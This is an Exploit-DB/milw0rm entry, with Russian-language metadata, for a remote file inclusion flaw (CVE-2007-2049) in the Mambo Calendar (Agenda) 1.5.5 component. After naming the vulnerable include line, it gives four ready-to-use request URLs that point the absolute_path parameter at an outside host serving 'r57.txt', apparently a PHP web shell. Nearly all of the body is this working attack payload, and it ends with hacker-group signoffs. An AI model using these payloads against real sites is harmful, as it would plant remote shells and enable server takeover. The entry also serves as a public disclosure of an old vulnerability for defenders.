Exploit Mambo Module Calendar (Agenda) 1.5.5 - Remote File Inclusion

[Exploiter]

EDB-ID

3713

Проверка EDB

1. Пройдено

Автор

COLD ZERO

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-2049

Дата публикации

2007-04-11

==================================================================
Mambo module Calendar (Agenda) <= 155 (com_calendar.php) Multiple RFI Vuln
==================================================================
Found By : Cold z3ro , [email protected]
==================================================================
Homepage: www.Hack-Teach.com
==================================================================
Script :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x/Calendar&i=agenda-155.zip
==================================================================
File : /com_calendar.php
include($absolute_path.'/components/calendar/cal_config.php');
==================================================================
/components/calendar/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/calendar/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
Or
/components/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]